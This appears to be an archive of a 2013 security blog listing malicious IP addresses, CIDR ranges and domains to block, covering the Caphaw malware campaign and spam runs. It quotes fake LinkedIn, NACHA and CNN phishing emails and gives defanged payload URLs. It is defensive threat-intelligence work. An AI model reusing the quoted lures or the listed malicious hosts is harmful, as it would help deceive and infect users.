The recommended blocklist is at the end of the post (highlighted). These are the hosts involved either now or recently with hosting these Caphaw domains:

5.175.173.219 (GHOSTnet, Germany)
5.231.66.192 (GHOSTnet, Germany)
23.90.28.12 (ServerHub Dallas, US)
46.4.47.20 (Hetzner, Germany)
46.4.47.21 (Hetzner, Germany)
46.4.47.22 (Hetzner, Germany)
88.198.57.178 (Hetzner, Germany)
88.200.98.137 (Studentski domovi v Ljubljani, Slovenia)
91.186.19.48 (Simply Transit, UK)
92.48.122.132 (Simply Transit, UK)
108.170.54.251 (eWebGuru, India / Secured Servers, US)
109.200.4.114 (Redstation, UK)
109.123.127.228 (UK2, UK)
141.8.225.5 (Rook Media, Switzerland)
151.236.49.136 (Simply Transit, UK)
153.153.19.23 (Open Computer Network, Japan)
181.41.193.168 (Host1plus Brazil, Chile)
184.22.246.31 (Network Operations Center, US)
184.82.62.95 (Network Operations Center, US)
188.227.161.26 (Redstation, UK)
198.52.243.229 (Centarra Networks, US)
199.68.199.178 (Lightwave Networking, US)
213.229.90.199 (Simply Transit, UK)

The following hosts appear to be hosting nameservers for these domains (note that USAISC has been identified doing this before):

1.165.101.158 (Chunghwa Telecom, Taiwan)
6.79.15.154 (USAISC, US)
31.83.89.143 (Orange PCS, UK)
62.75.232.182 (Eurostream, Lithunia / Intergenia AG, Germany)
78.188.5.201 (Turk Telekom, Turkey)
85.25.152.130 (Intergenia AG, Germany)
87.98.136.239 (OVH, France)
91.121.199.45 (OVH, France)
95.143.32.212 (Inline Internet, Germany)
188.138.10.29 (EvroHoster.ru. Ukraine / Intergenia AG, Germany)
188.138.10.30 (EvroHoster.ru. Ukraine / Intergenia AG, Germany)
188.138.78.229 (Eurostream, Lithunia / Intergenia AG, Germany)
188.138.78.232 (Eurostream, Lithunia / Intergenia AG, Germany)
188.138.78.248 (Stepan Alexander Mereuta, Moldova / Intergenia AG, Germany)
196.44.161.31 (Dar Es Salaam University, Tanzania)
198.52.240.8 (Avante Hosting Services, Canada)
217.172.187.9 (Intergenia AG, Germany)

These are the domains involved (I would strongly recommend blocking them):

afn.cc
akf.cc
alphard-info.net
astats.su
bai.su
blinking-imgs.su
caf.su
careservice.su
ciz.cc
collectserv.su
digital-in-one.cc
dig-services.at
dmf.su
eewuiwiu.cc
eguards.cc
enp.cc
e-statistics.su
estatus.cc
estatus.su
eux.cc
exy.su
fey.su
fooyuo.cc
frnm.su
g4-maxservice.su
giuchito.cc
guodeira.cc
gva.cc
higuards.su
ieguards.cc
iestat.cc
imgscores.cc
inetprotections.cc
infoenv.cc
invisibleski.com
iostat.su
istat.cc
iwebstats.cc
iwebstats.su
klr.su
lbb.su
lbp.cc
lil-web-svcs.su
limited-hsbc.com
llc-services.su
low-rates.su
lrnm.su
main2woo.su
nitecapvideo.net
nmbc.cc
nomorefees.cc
ognelisblog.net
online-verification.su
oprn.su
ormu.su
peguards.cc
pmr.cc
protected-onlinebanking.net
sj148-storage.net
standartextens.net
stat-service.net
sys-img-stores.cc
sysinfo.su
uceebeel.cc
up-stores.cc
veeceefi.cc
visite-mexico.net
webstats.su
wgate.su
wgate.su
wownthing.cc
wsysinfonet.su
zprn.su

Recommend IP blocklist (nameservers are in italics):

5.175.173.219
5.231.66.192
23.90.28.12
46.4.47.0/27
88.198.57.178
88.200.98.137
91.186.19.48
92.48.122.132
108.170.54.251
109.200.4.114
109.123.127.228
141.8.225.5
151.236.49.136
153.153.19.23
181.41.193.168
184.22.246.31
184.82.62.95
188.227.161.26
198.52.243.229
199.68.199.178
213.229.90.199
1.165.101.158
6.79.15.154
31.83.89.143
62.75.232.182
78.188.5.201
85.25.152.130
87.98.136.239
91.121.199.45
95.143.32.212
188.138.10.29
188.138.10.30
188.138.78.229
188.138.78.232
188.138.78.248
196.44.161.31
198.52.240.8
217.172.187.9

Thursday 14 November 2013

Malware sites to block 14/11/2013 (Caphaw)

These domains and IPs appear to be involved in a Caphaw malware attack, such as this one. All the IPs involved belong to Hetzner in Germany, and although some also host legitimate sites I would strongly recommend blocking them.

Recommended blocklist:
141.8.225.5
46.4.47.20
46.4.47.22
88.198.57.178
astats.su
blinking-imgs.su
careservice.su
collectserv.su
digital-in-one.cc
dig-services.at
eguards.cc
estatus.cc
fooyuo.cc
giuchito.cc
higuards.su
iestat.cc
inetprotections.cc
iostat.su
istat.cc
iwebstats.cc
iwebstats.su
klr.su
lbb.su
limited-hsbc.com
llc-services.su
nomorefees.cc
online-verification.su
peguards.cc
protected-onlinebanking.net
sj148-storage.net
standartextens.net
stat-service.net
sys-img-stores.cc
sysinfo.su
up-stores.cc
veeceefi.cc
webstats.su
wgate.su

Tuesday 6 August 2013

Malware sites to block 6/8/13

Following on from last week's list, this week seems to see a smaller number of servers and malicious domains from this crew.

5.175.191.124 (GHOSTnet, Germany)
24.173.170.230 (Time Warner Cable, US)
41.196.17.252 (Link Egypt, Egypt)
54.218.249.132 (Amazon AWS, US)
59.124.33.215 (Chungwa Telecom, Taiwan)
61.36.178.236 (DACOM Corp, Korea)
68.174.239.70 (Time Warner Cable, US)
78.47.248.101 (Hetzner, Germany)
95.87.1.19 (Trakia Kabel OOD, Bulgaria)
114.112.172.34 (Worldcom Teda Networks Technology Co. Ltd, China)
140.116.72.75 (TANET, Taiwan)
182.72.216.173 (Cusdelight Consultancy SE, India)
190.85.249.159 (Telmex Colombia, Colombia)
202.197.127.42 (CERNET, China)
208.115.237.88 (Limestone Networks / 123Systems Solutions, US)
217.64.107.108 (Society Of Mali's Telecommunications, Mali)

5.175.191.124
24.173.170.230
41.196.17.252
54.218.249.132
59.124.33.215
61.36.178.236
68.174.239.70
78.47.248.101
95.87.1.19
114.112.172.34
140.116.72.75
182.72.216.173
190.85.249.159
202.197.127.42
208.115.237.88
217.64.107.108
abundanceguys.net
amods.net
annot.pl
autocompletiondel.net
avini.ru
badstylecorps.com
beachfiretald.com
cbstechcorp.net
crossplatformcons.com
datapadsinthi.net
dulethcentury.net
endom.net
exhilaratingwiki.net
exowaps.com
explicitlyred.com
fivelinenarro.net
flashedglobetrot.pl
frontrunnings.com
hdmltextvoice.net
housesales.pl
ignitedannual.com
includedtight.com
jdbcandschema.su
lhobbyrelated.com
magiklovsterd.net
onsespotlight.net
operapoland.com
ordersdeluxe.com
organizerrescui.pl
playtimepixelating.su
prgpowertoolse.su
relectsdispla.net
ringosfulmobile.com
scourswarriors.su
sludgekeychai.net
streetgreenlj.com
tagcentriccent.net
tagcentriccent.pl
wildgames-orb.net
zestrecommend.com
zukkoholsresv.pl

Tuesday 30 July 2013

Malware sites to block 30/7/13

These sites and IPs are associated with this gang, and are either currently in use or they have been in use recently. The list has individual IPs and web hosts first, followed by a plain list of recommended items to block.

5.175.191.106 (GHOSTnet, Germany)
5.175.191.124 (GHOSTnet, Germany)
24.173.170.230 (Time Warner Cable, US)
24.188.19.227 (Optimum Online, US)
41.196.17.252 (Link Egypt, Egypt)
46.246.41.68 (Portlane Networks, Sweden)
50.97.253.162 (Softlayer Networks, US / ucvhost.com, India)
54.225.124.116 (Amazon AWS, US)
59.124.33.215 (Chungwa Telecom, Taiwan)
59.160.69.74 (TATA Communications, India)
68.174.239.70 (Time Warner Cable, US)
69.60.115.92 (Colopronto, US)
75.147.133.49 (Comcast Business Communications, US)
78.47.248.101 (Hetzner, Germany)
88.86.100.2 (Supernetwork, Czech Republic)
88.150.191.194 (Redstation, UK)
89.145.185.121 (Yeni Telekom Internet Hizmetleri, Turkey)
89.163.170.134 (Unitedcolo, Germany)
91.200.13.16 (SKS-Lugan, Ukraine)
91.210.189.157 (Eqvia LLC, Ukraine)
95.87.1.19 (Trakia Kabel OOD, Bulgaria)
95.111.32.249 (Megalan EAD, Bulgaria)
108.170.32.179 (Secured Servers, US / tudohost, Spain)
109.123.125.68 (UK2.NET, UK)
114.112.172.34 (Worldcom Teda Networks Technology Co. Ltd, China)
120.124.132.123 (TANET, Taiwan)
122.128.109.46 (Ximbo / CPCnet, Hong Kong)
162.209.80.221 (Rackspace, US)
166.78.124.4 (Rackspace, US)
182.72.216.173 (Cusdelight Consultancy SE, India)
185.4.252.124 (Eaglenet, Lebanon)
185.10.200.89 (GBServers Ltd, UK)
188.132.213.115 (Mars Global Datacenter Services LLC, Turkey)
190.85.249.159 (Telmex Colombia, Colombia)
192.162.100.225 (MediaServicePlus Ltd, Russia)
192.162.102.225 (MediaServicePlus Ltd, Russia)
193.105.210.211 (FOP Budko Dmutro Pavlovuch, Ukraine)
193.105.210.212 (FOP Budko Dmutro Pavlovuch, Ukraine)
193.239.242.83 (TRN Telecom, Russia)
196.1.95.44 (Ensut-Computer Department, Senegal)
198.61.213.12 (Rackspace, US)
198.98.102.165 (Enzu Inc, US)
202.197.127.42 (CERNET, China)
208.115.114.68 (Wowrack, US)
208.115.237.88 (Limestone Networks / 123Systems Solutions, US)
209.222.67.251 (Razor Inc, US)
211.224.204.141 (Korea Telecom, Korea)

Recommended blocklist:
5.175.191.106
5.175.191.124
24.173.170.230
24.188.19.227
41.196.17.252
46.246.41.68
50.97.253.160/27
54.225.124.116
59.124.33.215
59.160.69.74
68.174.239.70
69.60.115.92
75.147.133.49
78.47.248.101
88.86.100.2
88.150.191.194
89.145.185.121
89.163.170.134
91.200.13.0/24
91.210.189.157
95.87.1.19
95.111.32.249
108.170.32.176/29
109.123.125.68
114.112.172.34
120.124.132.123
122.128.109.46
162.209.80.221
166.78.124.4
182.72.216.173
185.4.252.124
185.10.200.89
188.132.213.115
190.85.249.159
192.162.100.225
192.162.102.225
193.105.210.0/24
193.239.242.83
196.1.95.44
198.61.213.12
198.98.102.165
202.197.127.42
208.115.114.68
208.115.237.88
209.222.67.251
211.224.204.141
50plus-login.com
aa.com.reservation.viewfareruledetailsaccess.do.sai-uka-sai.com
acehheadline.net
aldenizturizm.com
allgstat.ru
annot.pl
antidoctorpj.com
aqua-thermos.com
astarts.ru
auditbodies.net
aurakeep.net
beachfiretald.com
bebomsn.net
blindsay-law.net
bnamecorni.com
boats-sale.net
buffalonyroofers.net
businessdocu.net
businessua.com
buycushion.net
casinocnn.net
cbstechcorp.net
centow.ru
chromeupd.pw
cirriantisationsansidd79.net
condaleunvjdlp55.net
condalinaradushko5.ru
condalininneuwu36.net
condalinneuwu37.net
condalnua745746.ru
condrskajaumaksa66.net
crossplatformcons.com
doorandstoned.com
dulethcentury.net
duzybiust.net
ehnihjrkenpj.ru
eliroots.ru
erminwanbuernantion20.net
ermitirationifyouwau30.net
evenyouseemeinmin49.net
explicitlyred.com
facebook.com.n.find-friends.oncologistoncology.net
firerice.com
foremostorgand.su
fulty.net
generationpasswaua40.net
goingtothestreetofive59.net
gormoshkeniation68.net
gotoraininthecharefare88.net
greenleaf-investment.net
gromovieotvodidiejj40.net
hdmltextvoice.net
heidipinks.com
hotkoyou.net
housesales.pl
independinsy.net
info-for-health.net
jessesautobody.net
jonkrut.ru
kennebunkauto.net
klermont.net
klwines.com.order.complete.prysmm.net
kneeslapperz.net
linkedin.com.e.v2.kennebunkauto.net
links.emails.bmwusa.com.open.pagebuoy.net
locavoresfood.net
lsstats.ru
made-bali.net
medusascream.net
metanoiaonline.com
microsoftnotification.net
mifiesta.ru
mobile-unlocked.net
modshows.net
moonopenomy.com
motobrio.net
neplohsec.com
ns3.ozyurtdesign.com
ns4.ozyurtdesign.com
nvufvwieg.com
oncologistoncology.net
onemessage.verizonwireless.com.verizonwirelessreports.com
ontria.ru
organizerrescui.pl
oydahrenlitu346357.ru
pagebuoy.net
paypal.com.us.planetherl.net
playtimepixelating.su
prgpowertoolse.su
privat-tor-service.com
prothericsplk.com
prysmm.net
quill.com.account.settings.managemyaccount.moonopenomy.com
quipbox.com
relectsdispla.net
renouveaugatinois.com
saberig.net
sai-uka-sai.com
scourswarriors.su
secureprotection5.com
sendkick.com
sensetegej100.com
sludgekeychai.net
templateswell.net
thegalaxyatwork.com
thosetemperat.net
thybrothers.net
tintencenter.net
tor-connect-secure.com
tvblips.net
u-janusa.net
usergateproxy.net
verizonwirelessreports.com
viperlair.net
vip-proxy-to-tor.com
vitans.net
vivendacalangute.net
whitegocteenviet.com
wow-included.com
zestrecommend.com
zinvolarstikel.com
zukkoholsresv.pl

Thursday 18 April 2013

Malware sites to block 18/4/13, revisited

Quite late last night I posted some malicious IP address that I recommend blocking. I've had a chance to look at these more deeply, and some of them are in known bad IP ranges that you should consider blocking.

Most of these IP ranges are in Russia, blocking them will probably block some legitimate sites. If you don't do much business with Russia then it will probably not be an issue, if you do then you should exercise caution. There's a plain list at the bottom if you simply want to copy-and-paste.

Detected IP	Recommended block	Owner
5.9.191.179	5.9.191.160/26	(CyberTech LLC, Russia / Hetzner, Germany)
5.45.183.91	5.45.183.91	(Bradler & Krantz, Germany)
5.135.67.215	5.135.67.208/28	(MMuskatov-IE / OVH, France)
5.135.67.217
23.19.87.38	23.19.87.32/29	(Di & Omano Ltd, Germany / Nobis Technology, US)
37.230.112.83	37.230.112.0/23	(TheFirst-RU, Russia)
46.4.179.127	46.4.179.64/26	(Viacheslav Krivosheev, Russia / Hetzner Germany)
46.4.179.129
46.4.179.130
46.4.179.135
46.37.165.71	46.37.165.71	(BurstNET, UK)
46.37.165.104	46.37.165.104	(BurstNET, UK)
46.105.162.112	46.105.162.112/26	(Shah Sidharth, US / OVH, France)
62.109.24.144	62.109.24.0/22	(TheFirst-RU, Russia)
62.109.26.62
62.109.27.27
80.67.3.124	80.67.3.124	(Portlane Networks, Sweden)
80.78.245.100	80.78.245.0/24	(Agava JSC, Russia)
91.220.131.175	91.220.131.0/24	(teterin Igor Ahmatovich, Russia)
91.220.131.178
91.220.163.24	91.220.163.0/24	(Olevan plus, Ukraine)
94.250.248.225	94.250.248.0/23	(TheFirst-RU, Russia)
108.170.4.46	108.170.4.46	(Secured Servers, US)
109.235.50.213	109.235.50.213	(xenEurope, Netherlands)
146.185.255.97	146.185.255.0/24	(Petersburg Internet Network, Russia)
146.185.255.207
149.154.64.161	149.154.64.0/23	(TheFirst-RU, Russia)
149.154.65.56
149.154.68.145	149.154.68.0/23	(TheFirst-RU, Russia)
173.208.164.38	173.208.164.38	(Wholesale Internet, US)
173.234.239.168	173.234.239.160/27	(End of Reality LLC, US / Nobis, US)
176.31.191.138	176.31.191.138	(OVH, France)
176.31.216.137	176.31.216.137	(OVH, France)
184.82.27.12	184.82.27.12	(Prime Directive LLC, US)
188.93.211.57	188.93.210.0/23	(Logol.ru, Russia)
188.120.238.230	188.120.224.0/20	(TheFirst-RU, Russia)
188.120.239.132
188.165.95.112	188.165.95.112/28	(Shah Sidharth, US / OVH France)
188.225.33.62	188.225.33.0/24	(Transit Telecom, Russia)
188.225.33.117
192.210.223.101	192.210.223.101	(VPS Ace, US / ColoCrossing, US)
193.106.28.242	193.106.28.242	(Centr Informacionnyh Technologii Online, Ukraine)
193.169.52.144	193.169.52.0/23	(Promobit, Russia)
195.3.145.99	195.3.145.99	(RN Data, Latvia)
195.3.147.150	195.3.147.150	(RN Data, Latvia)
198.23.250.142	198.23.250.142	(LiquidSolutions, Bulgaria / ColoCrossing, US)
198.46.157.174	198.46.157.174	(Warfront Cafe LLC, US / ColoCrossing, US)
205.234.204.151	205.234.204.151	(HostForWeb, US)
205.234.204.190	205.234.204.190	(HostForWeb, US)
205.234.253.218	205.234.253.218	(HostForWeb, US)
213.229.69.40	213.229.69.40	(Poundhost, UK / Simply Transit, UK)

5.9.191.160/26
5.45.183.91
5.135.67.208/28
23.19.87.32/29
37.230.112.0/23
46.4.179.64/26
46.37.165.71
46.37.165.104
46.105.162.112/26
62.109.24.0/22
80.67.3.124
80.78.245.0/24
91.220.131.0/24
91.220.163.0/24
94.250.248.0/23
108.170.4.46
109.235.50.213
146.185.255.0/24
149.154.64.0/23
149.154.68.0/23
173.208.164.38
173.234.239.160/27
176.31.191.138
176.31.216.137
184.82.27.12
188.93.210.0/23
188.120.224.0/20
188.165.95.112/28
188.225.33.0/24
192.210.223.101
193.106.28.242
193.169.52.0/23
195.3.145.99
195.3.147.150
198.23.250.142
198.46.157.174
205.234.204.151
205.234.204.190
205.234.253.218
213.229.69.40

Wednesday 10 April 2013

ICANN: thanks for the malware spam / mailedspokesperson.biz

This is a pretty straightforward LinkedIn themed spam that leads to malware on mailedspokesperson.biz:

From:    Leonide Saad - LinkedIn [dreamland@beutelschneiderhamburg.de]
Date:    10 April 2013 15:19
Subject:    Join my network on LinkedIn

LinkedIn
REMINDERS

Invitation reminders:
From Leonide Saad (Developer at Perot Systems)

PENDING MESSAGES

There are a total of 8 messages awaiting your response. Go to InBox now.

This message was sent to username@domain.com. Don't want to receive email notifications? Login to your LinkedIn account to Unsubscribe.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. c 2013, LinkedIn Corporation.

The catch with this is that the email address being used is one used only to file WHOIS Compliance Reports with ICANN. If you file reports of inaccurate WHOIS data, then you need to be aware that by default ICANN will forward your contact details to the bad guys.. you can request that this be suppressed, but using an alias is (ironically) probably the best bet. So in this case, the bad guys have presumably just added the email in the complaint to their spam list..

Anyway, this has a link to a legitimate hacked site and thence on to [donotclick]mailedspokesperson.biz/closest/f2ihoiwegjowiejf230hfaj.php (report here) hosted on 46.4.150.117 (Siteko Ltd / Hetzner Online, Germany). The WHOIS details are characteristic of the Amerika gang:

Registrant ID:            INTEUMYC18TPLDWG
Registrant Name:          Hunter Afkham
Registrant Address1:      181 Sullivan St #4
Registrant City:          New York
Registrant Postal Code:   10012
Registrant Country:       United States
Registrant Country Code: US
Registrant Phone Number: +1.7914260046
Registrant Email:         hunter_afkham8428@aristotle.org

There are a couple of other bad looking sites on the same server, so this is my recommended blocklist:
46.4.150.117
1thyntyny.itemdb.com
diesulead.biz
mailedspokesperson.biz

Wednesday 27 March 2013

NACHA spam / mgithessia.biz

This fake NACHA spam leads to malware on mgithessia.biz:

From: "Олег.Тихонов@direct.nacha.org" [mailto:universe87@mmsrealestate.com]
Sent: 27 March 2013 03:25
Subject: Disallowed Direct Deposit payment
Importance: High

To whom it may concern:

We would like to inform you, that your latest Direct Deposit via ACH transaction (Int. No.989391803448) was cancelled,because your business software package was out of date. The details regarding this matter are available in our secure section::

Click here for more information

Please consult with your financial institution to obtain the updated version of the software.

Kind regards,

ACH Network Rules Department
NACHA - The Electronic Payments Association

11329 Sunrise Valley Drive, Suite 865
Herndon, VA 20172
Phone: 703-561-1927 Fax: 703-787-1894

The malicious payload is at [donotclick]mgithessia.biz/closest/repeating-director_concerns.php although I am having difficulty resolving that domain, however it appears to be on 46.4.150.118 (Hetzner, Germany) and the payload looks something like this.

DNS services are provided by justintvfreefall.org which is also probably malicious. Nameservers are on 5.187.4.53 (Fornex Hosting, Germany) and 5.187.4.58 (the same).

Recommended blocklist:
46.4.150.118
5.187.4.53
5.187.4.58
mgithessia.biz
justintvfreefall.org

Tuesday 19 March 2013

Malware spam: "Opinion: Cyprus banks shut extended to Monday - CNN.com" / salespeoplerelaunch.org

This topically themed (but fake) CNN spam leads to malware on salespeoplerelaunch.org:

Date:     Tue, 19 Mar 2013 10:40:22 -0600
From:     "CNN Breaking News" [BreakingNews@mail.cnn.com]
Subject:     Opinion: Cyprus banks shut extended to Monday - CNN.com


Powered by
* Please note, the sender's email address has not been verified.


You have received the following link from BreakingNews@mail.cnn.com:


Click the following to access the sent link:


Cyprus banks shut extended to Monday - CNN.com*

Get your EMAIL THIS Browser Button and use it to email content from any Web site. Click here for more information.


*This article can also be accessed if you copy and paste the entire address below into your web browser.
by clicking here

The malicious payload is at [donotclick]salespeoplerelaunch.org/close/printed_throwing-interpreting-dedicated.php (report here) hosted on 69.197.177.16 (WholeSale Internet, US).

Nameservers are NS1.DNSLVLUP.COM (5.9.212.43, Hetzner / Dolorem Ipsum Management Ltd, Germany) and NS2.DNSLVLUP.COM (66.85.131.123, Secured Servers LLC / Phoenix NAP, US)

Recommended blocklist:
salespeoplerelaunch.org
dnslvlup.com
69.197.177.16
5.9.212.43
66.85.131.123

Link List

Sponsored by..